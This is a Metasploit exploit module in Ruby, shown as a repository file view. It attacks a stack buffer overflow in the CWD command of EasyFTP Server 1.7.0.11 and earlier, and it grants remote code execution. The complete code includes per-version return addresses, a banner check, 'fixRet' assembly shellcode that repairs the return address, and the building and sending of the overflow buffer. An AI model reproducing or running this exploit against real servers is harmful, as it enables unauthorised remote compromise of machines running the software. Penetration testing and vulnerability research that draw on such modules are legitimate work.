root / modules / exploits / windows / ftp / easyftp_cwd_fixret.rb @ master
History | View | Annotate | Download (5.1 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GreatRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::Ftp |
| 18 |
|
| 19 |
def initialize(info = {}) |
| 20 |
super(update_info(info,
|
| 21 |
'Name' => 'EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow', |
| 22 |
'Description' => %q{ |
| 23 |
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 |
| 24 |
and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which |
| 25 |
leads to a stack based buffer overflow. EasyFTP allows anonymous access by |
| 26 |
default; valid credentials are typically unnecessary to exploit this vulnerability. |
| 27 |
|
| 28 |
After version 1.7.0.12, this package was renamed "UplusFtp". |
| 29 |
|
| 30 |
This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. |
| 31 |
This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by |
| 32 |
'fixing' the return address post-exploitation. See references for more information. |
| 33 |
},
|
| 34 |
'Author' =>
|
| 35 |
[ |
| 36 |
'Paul Makowski <my.hndl[at]gmail.com>', # original version |
| 37 |
'jduck' # various fixes, remove most hardcoded addresses |
| 38 |
], |
| 39 |
'License' => MSF_LICENSE, |
| 40 |
'Version' => '$Revision$', |
| 41 |
'References' =>
|
| 42 |
[ |
| 43 |
[ 'OSVDB', '62134' ], |
| 44 |
[ 'URL', 'http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/' ], |
| 45 |
[ 'URL', 'http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit' ], |
| 46 |
[ 'URL', 'http://seclists.org/bugtraq/2010/Feb/202' ], |
| 47 |
[ 'URL', 'http://code.google.com/p/easyftpsvr/'], |
| 48 |
[ 'URL', 'https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip' ], |
| 49 |
[ 'URL', 'http://www.securityfocus.com/bid/38262/exploit'] |
| 50 |
], |
| 51 |
'Privileged' => false, |
| 52 |
'Payload' =>
|
| 53 |
{
|
| 54 |
# Total bytes able to write without crashing program (505) - length of fixRet (25) - slack space (30) = 450
|
| 55 |
'Space' => 505 - 30 - 25, |
| 56 |
'BadChars' => "\x00\x0a\x2f\x5c", # from: http://downloads.securityfocus.com/vulnerabilities/exploits/38262-1.py |
| 57 |
'DisableNops' => true |
| 58 |
}, |
| 59 |
'Platform' => 'win', |
| 60 |
'Targets' =>
|
| 61 |
[ |
| 62 |
[ 'Windows Universal - v1.7.0.2', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe |
| 63 |
[ 'Windows Universal - v1.7.0.3', { 'Ret' => 0x00404121 } ], # call edi - from ftpbasicsvr.exe |
| 64 |
[ 'Windows Universal - v1.7.0.4', { 'Ret' => 0x00404111 } ], # call edi - from ftpbasicsvr.exe |
| 65 |
[ 'Windows Universal - v1.7.0.5', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe |
| 66 |
[ 'Windows Universal - v1.7.0.6', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe |
| 67 |
[ 'Windows Universal - v1.7.0.7', { 'Ret' => 0x004040ea } ], # call edi - from ftpbasicsvr.exe |
| 68 |
[ 'Windows Universal - v1.7.0.8', { 'Ret' => 0x004043ca } ], # call edi - from ftpbasicsvr.exe |
| 69 |
[ 'Windows Universal - v1.7.0.9', { 'Ret' => 0x0040438a } ], # call edi - from ftpbasicsvr.exe |
| 70 |
[ 'Windows Universal - v1.7.0.10', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe |
| 71 |
[ 'Windows Universal - v1.7.0.11', { 'Ret' => 0x0040435a } ], # call edi - from ftpbasicsvr.exe |
| 72 |
], |
| 73 |
'DisclosureDate' => 'Feb 16 2010', |
| 74 |
'DefaultTarget' => 0)) |
| 75 |
end
|
| 76 |
|
| 77 |
def check |
| 78 |
connect |
| 79 |
disconnect |
| 80 |
|
| 81 |
if (banner =~ /BigFoolCat/) # EasyFTP Server has undergone several name changes |
| 82 |
return Exploit::CheckCode::Vulnerable |
| 83 |
end
|
| 84 |
return Exploit::CheckCode::Safe |
| 85 |
end
|
| 86 |
|
| 87 |
def exploit |
| 88 |
connect_login |
| 89 |
|
| 90 |
# If the payload's length is larger than 233 bytes then the payload must be bisected with the return address and later patched.
|
| 91 |
# Explanation of technique: http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
|
| 92 |
|
| 93 |
# NOTE:
|
| 94 |
# This exploit jumps to edi, which happens to point at a partial version of
|
| 95 |
# the 'buf' string in memory. The fixRet below fixes up the code stored on the
|
| 96 |
# stack and then jumps there to execute the payload. The value in esp is used
|
| 97 |
# with an offset for the fixup.
|
| 98 |
fixRet_asm = %q{
|
| 99 |
mov ecx, 0xdeadbeef |
| 100 |
mov edi, esp |
| 101 |
sub edi, 0xfffffe14 |
| 102 |
mov [edi], ecx |
| 103 |
add edi, 0xffffff14 |
| 104 |
jmp edi |
| 105 |
}
|
| 106 |
fixRet = Metasm::Shellcode.assemble(Metasm::Ia32.new, fixRet_asm).encode_string |
| 107 |
|
| 108 |
buf = ''
|
| 109 |
|
| 110 |
print_status("Prepending fixRet...")
|
| 111 |
buf << fixRet |
| 112 |
buf << make_nops(0x20 - buf.length)
|
| 113 |
#buf << "C" * (0x20 - buf.length)
|
| 114 |
|
| 115 |
print_status("Adding the payload...")
|
| 116 |
buf << payload.encoded |
| 117 |
|
| 118 |
# Backup the original return address bytes
|
| 119 |
buf[1,4] = buf[268,4] |
| 120 |
|
| 121 |
print_status("Overwriting part of the payload with target address...")
|
| 122 |
buf[268,4] = [target.ret].pack('V') # put return address @ 268 bytes |
| 123 |
|
| 124 |
# NOTE: SEH head at offset 256 also gets smashed. That is, it becomes what is at fs:[0] ..
|
| 125 |
|
| 126 |
print_status("Sending exploit buffer...")
|
| 127 |
send_cmd( ['CWD', buf] , false) # this will automatically put a space between 'CWD' and our attack string |
| 128 |
|
| 129 |
handler |
| 130 |
disconnect |
| 131 |
end
|
| 132 |
|
| 133 |
end
|